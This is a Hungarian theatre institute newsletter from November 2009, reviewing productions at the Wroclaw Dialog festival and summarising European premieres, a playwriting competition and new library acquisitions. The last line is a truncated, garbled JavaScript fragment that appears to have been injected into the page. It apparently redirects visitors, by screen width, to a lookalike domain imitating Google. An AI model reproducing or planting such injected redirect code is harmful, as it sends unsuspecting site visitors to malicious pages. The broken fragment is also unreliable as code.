OSZMI-ITI HÍRLEVÉL 2009. november

OSZMI-ITI HIRLEVEL 2009/11.

 

1. Hirek

1.1.Wroclaw Dialog Festival 

1.2. Szinhazi fesztival: Tank az Atokfoldjen

1.3. A Young Vic 2010 tavaszi evadanak musora

1.4. Uj kortars muvek bemutatoi Angliaban

1.5. Kortars nemet drama symposium

1.6. World Stage Design 2009 dijazottja Csanadi Judit

 

2. Kortars drama

2.1. Colin es Mary Crowther: Just Passing

 

 

3. ITI Figyelo: Felhivas, palyazat, informacio

3.1. Nemzetkozi dramapalyaza

3.2. Uj szerzemenyek az OSZMI konyvtaraban

 

 

1. Hirek

1.1.Wroclaw Dialog Fesztival 

Wroclaw a hatvanas evek vegen, a hetvenes evek elejen szinhazi fovarosnak szamitott. Akkoriban itt rendeztek azt a nemzetkozi szinhazi fesztivalt, ahol a legrangosabb tarsulatok munkajat mutattak be, de Grotowski eloadasait is meg lehetett nezni.

Ezt a szellemiseget folytatja a DIALOG-WROCLAW Fesztival, amelyet 2005-ben hozott letre a szinhazigazgato-rendezo Kyistyna Meissner. Kulonlegesnek szamit ez a rendezvenysorozat, es nem csak Lengyelorszagban, hanem Europaban is. Iden az NKA tamogatasanak jovoltabol az ITI Magyar Kozpontja reszt vehetett a fesztivalon. Ennek az az oka, hogy Meissner nem arra torekszik, hogy az eppen aktualis, hires eloadasokat, nepszeru rendezoket, felkapott tarsulatokat hivja meg. O egy-egy eppen fontos, a tarsadalmat es muveszeket erdeklo, izgalmas tema kore szervezi a meghivott produkciokat. Iden a valogatast a „Szemben a Gonosszal" gondolata hatarozta meg. A Gonosz pedig a legkulonfelebb modokon jelent meg az eloadasokban.  

A Wspolczesny Teatr (Wroclaw) fiatal szineszeinek Kaspar eloadasa a kiszolgaltatott ember tragediajat fogalmazta meg. Itt a cimszerepet alakito szinesz jateka volt a kiemelkedo. (rendezo: Barbara Wysocka) A moszkvai Szinmuveszeti eloadasa a holokauszt tragediajat es a sztalinizmus embernyomorito rendszeret koltoi targy- es babjatekkal fogalmazta meg. Az eloadas elso reszeben a fotok, vetitesek, targyak felhasznalasaval fajdalmasan szep koltoi kepekkel mutattak be egy vilag, hagyomany, tortenet elsullyedeset. A masodik felvonasaban egy noi oriasbabu mindenkit beterit, felemeszt, elural, markaban a kisember csak tehetetlenul kapalodzik. Az eloadas nem volt egyseges, az elso resz koltoisege nem volt fellelheto a masodikban, ahol az oriasbabu eroteljes megjelenese inkabb csak eros otletnek tetszett, de nem volt elegendo az egeszre. (Opus nr 7, rendezo: Dimitrij Krimov) 

Dosztojevszkij Felkegyelmujet a litvan Meno Fortas Tarsulat adta elo Eimuntas Nekrosius rendezeseben. Miskin herceg svajci szanatoriumi kezeleserol ter haza Szentpetervarra, ahol a maga naiv josagaval kozelit a vilaghoz, az emberekhez. A szinpadkep most is egyszeru, jelzesszeru: hatul kozepen egy hatalmas, ketszarnyu, felfuggesztett ajto, baloldalt zongora, hatul az ajto mellett asztal szekekkel. Elol ures a ter.

A szereplok Nekrosius tobbi eloadasahoz kepest sokkal jobban torekszenek az egymas kozotti szenvedelyes es pszichologizalo viszonyok kifejezesere. Hol felnottkent, hol egymast banto, esetlen kamaszokkent csapnak ossze a szereplok.  

Grzegorz Jarzyna rendezese a T.E.O.R.E.M.A.T. Pier Paolo Pasolini muvenek szinpadi valtozata.Az eloadas ereje talan eppen az eros, hideg, kiszamitott diszlet. A szinpad baloldalan feher falak, amelyeken alul regi varoskep reszletek, baloldalt ablakok megvilagitva, hatul egy asztal, amely korul hol esznek, hol a csalad kamaszfia modelleket keszit. Az impozans szinpad ridegseget a vilagitassal meg tovabb fokozza a rendezo.

Egy titokzatos latogato, aki varatlanul toppan be a gazdag gyaros csaladjahoz, felboritja annak napi rutinjat. Erotikus vonzasaval a csalad minden egyes tagjat elcsabitja, majd ugyanolyan varatlanul, ahogy erkezett, eltunik, de ezutan minden megvaltozik, szetesik. Az eloadas azt sugallja, hogy ez az egyszeruen oltozott, szinte jelentektelennek tuno vendeg lehet maga az ordog vagy az Isten megtestesulese. A jelmezek szinenek valtozasa, a diszlet mozgasa egy-egy fordulopontot jelez, valamint fokozatosan kitagitja a csaladi teret, s vezeti a nezot a „vilag" fele. 

Marthaler Riesenbutzbach: a Permanent Colony cimmel rendezett eloadasanak nincs tortenete, es a diszlet alapjan barmelyik europai varosban jatszodhat(na), ahol van bank, bevasarlo kozpont, garazs, udvar. Egy profitra es fogyasztasra epulo, valsag sujtotta vilag groteszk rajza az eloadas. A helyszint eloszor a noi korus uralja, amelynek kulonbozo koru tagjai a hetkoznapjaikra es a ferfiakra panaszkodnak. Majd megjelennek a ferfiak es csatlakoznak asszonyaikhoz. A sok apro jelenetbol arad az ironia, egyre vadabb burleszkbe fordulnak a kulonbozo szituaciok. Vegigvonul peldaul az eloadason egy anya-fiu kapcsolatot bemutato szal: a fiu/ferfi mar kis kora ota csak franciaul ert, mig anyja csak nemetul, es ez jol „megalapozza" viszonyukat. Az eloadas vege fele pedig egy igen mulatsagos es lehetetlen divatbemutato lathato. Erik Satie zenejere a leghetkoznapibb, lehetetlen oltozekekben vonulnak fel a szereplok - a kifutokon fellepoktol ellesett mozgassal es mozdulatokkal. A rendezo azt teszi lehetove a nezo szamara, hogy nemi tavolsagbol, ralatassal szemlelje nyomaszto, kozep- es kisszeru, egoista es cinikus vilagunkat. 

A sok jo  es izgalmas eloadasbol kiemelkedett az amszterdami Toneelgroepe. Ok nemregiben jartak Magyarorszagon, a Nemzeti Szinhazban adtak elo Premier cimu produkciojukat, amelybol megismerhette a nezo azokat az eszkozoket, amelyek stilusukat meghatarozzak. A Wroclawban latott, Shakespeare darabokra epulo eloadas is hasonlo szellemben, technikaval jott letre, de sokkal osszetettebb, melyebb volt, mint a pesti.  

A hatoras  Roman Tragedies-t szunet nelkul jatszottak egy hatalmas filmgyari studioban. A nezot egy dobogorendszeru nezoter es egy legalabb ugyanakkora, bezs kanapekkal szabdalt szinpad fogadja, ahol rengeteg monitor lathato, ket szelen hosszu asztalokkal. A bal oldalin helyet kap a sminkes es a fodrasz, meg a bufe. Jobbra pedig a technikusok, egy masik bufe es negy laptop, amelyet az eloadas kozben is hasznalhatott barki. A felkinalt ot perces szunetekben a nezoter felbolydult, elindult: a bufehez vagy a bezs kanapekhoz, hogy onnan figyeljek, akar a monitorokon keresztul is az eloadast. Ebben a darabban is vettek a szereploket kameraval, es felnagyitva a vasznon vagy a monitoron, duplan, triplan, megsokszorozva lehetett latni a szinpadon „eloben" zajlo jelenetet. Mindezzel fizikailag is szinte arra kenyszeritettek a nezot, hogy szokasos bameszkodo szerepebol kimozdulva, valamilyen modon reszese legyen a jateknak.

A rendezo  Ivo van Hove a Julius Caesar, Antonius es Kleopatra valamint a Coriolanus cimu darabokbol alkotta meg az eloadas szoveget, amelybol minden csatajelenetet kihagyott. Nem a haboru erdekelte, hanem a hatalom termeszete, a haboruhoz vezeto ut, az egyes szereplok viselkedese, gondolkodasa, erdekrendszere. A gyilkossagok es haboruk tenyet egy mondatos lenyegre korlatozva, a gyorshirek vilagat idezoen, a megfelelo idoben egy hirdetesi kivetiton jeleniti meg a piros betus szoveg: Julius Caesar elt ettol eddig, Marcus Antonius elt ettol eddig, ez es ez a csata ekkor es ekkor zajlott. Sot, idoben „figyelmeztetik" a nezot, hogy peldaul Kleopatra gyilkossagara 40 perc mulva kerul sor. 

A szereplok mai ruhakat viseltek: fokent jol szabott kosztumoket, oltonyoket. Egy-egy osszeeskuvesre, gyilkossagra, haborura valo felkeszules, elokeszulet olykor egy targyaloasztal korul zajlik, felidezve a nagy nemzetkozi szervezetek vagy parlamentek politikusainak vitatkozasat, magatartasat. Eloszor nyugalmat eroltetnek magukra a szereplok, vegul lemallik roluk minden, aminek koze lehet a civilizalt viselkedeshez, es egymasnak esnek. Maskor egy sajtoszobat, szerkesztoseget idezo helyszinen vitatjak meg, az informaciok es tudas birtokaban levok azt, hogy mit mikor es hogyan kell tenni. A haborus elokeszuletekrol idonkent a tevehirado interjuibol, helyszini kozvetiteseibol ertesulhet a kozonseg. A kozonseg, ahogy talan Shakespeare koraban is, a produkcio kozben elte sajat eletet, kielegitve szellemi es egyeb eletfunkcioit is. A nezo egyszerre latja a valosagos szinpadon zajlo jeleneteket, amelyek megsokszorozodnak a kivetitokon es monitorokon. Ezekbol ki-ki megalkothatja sajat eloadasat. Azonban barmilyen ez a „sajat eloadas", az eros rendezoi elkepzelesnek es a muveszek jatekanak koszonhetoen mindenkeppen a politikai manipulacio termeszetrajzarol szol. (L.A.)

1.2.Szinhazi fesztival: Tank az Atokfoldjen


 Tizenhet europai dramaszerzo irt darabot a berlini fal leomlasanak kovetkezmenyeirol. Az After the Fall, a Goethe Intezet hatarokon atnyulo szinhazi projektje nem fest hizelgo kepet Europarol. Az elkeszult muvek kozul kivalasztottak hetet, amelyeket 2009. oktober 31. es november 8. kozott a drezdai szinhazi fesztivalon lathat a kozonseg.

 

Tiz eves vagy, es a tanar vonalzoval kormost ad neked. Tiz eves vagy, es minden heten levelet kell irnod a bekerol. Tiz eves vagy, es szet tudsz szedni es ossze tudsz rakni egy Kalasnyikovot harom perc alatt. Az 1978-ban szuletett, moldvai Nicoleta Esinencu vadakkal teli, Antidot cimu darabja szerint tekintelyelvu tarsadalomban elunk, ahol semmi nem valtozott a fal leomlasa es a diktatura megszunese ota. Vad es duhtol izzo szenvedellyel idezi meg az auschwitz-i gazkamrak genocidiumat, Csernobil nuklearis katasztrofajat es a konyhai gazsutoben tortent ongyilkossagot, a lathatatlan mereg kozremukodeset, ami a lelki fertozottseg metaforaja lesz az eloadasban. Az Antidot premierje oktober 31-en volt a Staatsschauspiel Dresden-ben.

 

Az idegengyulolet uj fajtajat lathatjuk Dirk Laucke, az 1982-es szuletesu, keletnemet dramairo Fur alle reicht es nicht cimu darabjaban, amelyben o sem kimeli sajat orszagat, es a tarsadalom egyes szamkivetettjeire koncentral. Jo es Anna cigarettacsempeszessel keresi a kenyeret, Heiner pedig megjavit egy tankot a puszta kozepen kozel a cseh hatarhoz, es a haborus idokrol almodozik. A konfliktus akkor kezdodik, amikor megtalalnak egy illegalis azsiai menekulttel teli teherautot. A „fiji"-knek el kell tunniuk, jelenti ki Heiner neo-naci zsargonjaval elve. Ugyan Jo-ban reszvet ebred az azsiaiak irant, megis hagyjak, hogy a menekultek a teherautoban pusztuljanak.

 

A Goethe Intezet igazgatoja szerint az After the Fall projekt rendkivuli hatasu a kortars dramairodalomra es a kozonsegre egyarant, es tovabbi szinhazi networkepites soran remeli ennek eredmenyeit terjeszteni Europa orszagaiban.

 

 

 

1.3. A Young Vic 2010 tavaszi evadanak musora

 

A londoni Young Vic bejelentette 2010 tavaszi evadara vonatkozo musortervet. Januar 21-en mutatjak be Amir Nizar Zuabi I Am Yusuf And This Is My Brother cimu darabjat a szerzo sajat rendezeseben. Az 1948-ban Palesztinaban jatszodo eloadas a tortenelem, emlekezet es a szeretet kulonbozo formainak koltoi felfedezese, es a Shiber-Hur nevu palesztin tarsulattal koprodukcioban valosul meg. Arthur Schnitzler: Sweet Nothings cimu muvet Luc Bondy rendezte, es David Harrower uj valtozataban lathato majd marcius 4-tol: tanulsagos tortenet a szexualis vagyakozasrol, a hagyomany kegyetlensegerol, es arrol, hogy a szerelmesek milyen sebezhetok. Aprilis 24-en lesz a bemutatoja az Elegy For Young Lovers cimu operanak, amelynek zenejet Hans Werner Henze szerezte, librettojat W H Auden es Chester Kallman irta. Egy koltorol szol, aki mindenkit tonkretesz maga korul, hogy muveszetet es onerzetet taplalja. 

 

 

1.4. Uj kortars muvek bemutatoi Angliaban

 

Az angol szinhaz az idei szezonban is torekszik a honi kortars szerzok bemutatasara. Ezek sorat Howard Barker: Found and Ground cimu, koltoi ereju alkotasanak bemutatoja nyitja a Riverside Studioban. A National tuzi musorara David Hare: The Power of Yes c. muvet, amelynek kozeppontjaban a gazdasagi vilagvalsag all, illetve annak megerteset kiserli meg a szerzo.

A Royal Courtban lesz lathato Tim Crouch : The Author c. darabja, amely az illuzio, a fikcio es a realitas kevereke az eroszakrol, es arrol, hogy mit vagyunk hajlandoak eszrevenni peldaul egy, a szemunk elott zajlo konfliktusbol. Az eloadas kulonlegesseget az is adja, hogy a jatekban a kozonseg aktiv szerepet kap.

1.5. Kortars nemet drama symposium

Nothing Older than Yesterday's Premier cimmel kortars nemet drama symposiumot tartottak Berlinben 2009. oktobereben. A szinhazak minel tobb bemutatot igyekeznek tartani, ez jelzi a sikeres mukodesuket. Ezzel szemben nem akarnak mar bemutatott uj darabokat ismet szinpadra vinni - igy panaszkodnak a fiatal dramairok. A rendezok, dramaturgok es kritikusok szerint viszont ezekbol a friss, kortars dramakbol gyakran hianyzik a kello fajsulyossag. A berlini konferencian minden fel kepviseltethette magat a kerekasztal-beszelgetesen, amibol a mai nemet kortars drama helyzete elesen kirajzolodott.

1.6. World Stage Design 2009 dijazottja Csanadi Judit

Rangos nemzetkozi dijjal jutalmaztak Csanadi Juditot harom, a Gardonyi Geza Szinhazban bemutatott eloadashoz keszitett diszletterveert, amelyet tobb mint ezer mu kozul valasztott ki a nemzetkozi zsuri. A Peer Gynt, A nagyratoro es Az allhatatlan cimu eloadasokat Csizmadia Tibor rendezte.

 

2. Kortars drama

 

2.1. Colin es Mary Crowther: Just Passing

 

Szereplok:

 

Ferfi - 40 es 70 ev kozott. Derus, felfrissult.

No - 40 es 70 ev kozott. Szeszelyes, kimerult.

Apolono - 50 es 60 ev kozott. Elhasznalt, gondoskodo.

 

Szerelmi tortenet vagy kisertethistoria? Colin es Mary Crowther szerzoparos Just Passing cimu, meleg hangu es szellemes egyfelvonasosa egy ferfi es no talalkozasarol szol, ahogy a parkban bucsut vesznek egymastol egy padon. De melyikuk hagyja el a masikat, es miert?

Ugy tunik, hogy civakodasuk ellenere boldog hazassagban eltek mindaddig, amig egy autobaleset miatt a Ferfi szanatoriumba nem kerult. Most el kell koltoznie, hogy a No tovabblephessen.  A joindulatu, de unott apolono elkotyogott megjegyzese lesz az utolso csepp a poharban.  A bucsu hallgatolagos - a No taxiert rohan es elviharzik, a Ferfi ulve marad, amig el nem halvanyul az emlek.

 

Colin es Mary Crowther darabjat 2008. novembereben adta ki a Samuel French Ltd. A szerzoparos egyeb dramai: Till We Meet Again, Reflections, Lost Garden, Noah's Ark.

 

 

 

 

3. ITI  Figyelo: Felhivas, palyazat, informacio

 

3.1. Nemzetkozi dramapalyazat

A Nemzetkozi Szinhazi Intezet kereteben mukodo Dramairok Nemzetkozi Foruma palyazatot hirdet 2010-re. Ezen olyan temaju darabokkal lehet benevezni, amelyek a ma vilag legegetobb problemaival foglalkoznak, mint a szamuzetes, a migracio, az identitas. A dramakat angol, francia vagy arab nyelven lehet beadni. A mu nem haladhatja meg a szaz oldalt, es nem lehet monodrama. Nemzetkozi zsuri dont a dijak odaiteleserol. (Elso dij: 3000 US dollar, masodik dij: 2000 US dollar, harmadik dij: 1000 US dollar)

Beadasi hatarido: 2010. junius 30.

 

SuisseTHEATRE ITI

International Theatre Institute

Ursula Werdenberg

Directrice

Geschaftsfuhrerin

***

General Guisan-Strasse 174

CH - 4054 Basel

Switzerland

Tel.: + 41-61-301 85 15

Fax : + 41-61-301 85 16

This e-mail address is being protected from spambots. You need JavaScript enabled to view it

www.iti-swiss.ch

3.2. Uj szerzemenyek az OSZMI konyvtaraban

A Cseh Szinhazi Intezet altal kiadott, gazdagon illusztral konyv  Josef Svoboda eletmuvet mutatja be.

Megjelent a Visegrad Drama harmadik kotete, amelyben Orkeny Istvan: Totek cimu darabjanak uj angol forditasa olvashato, valamint Szirak Peter tanulmanya a szerzorol.

 
     

Keszitettek: Lakos Anna (szerk.), Rakoczy Anita

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width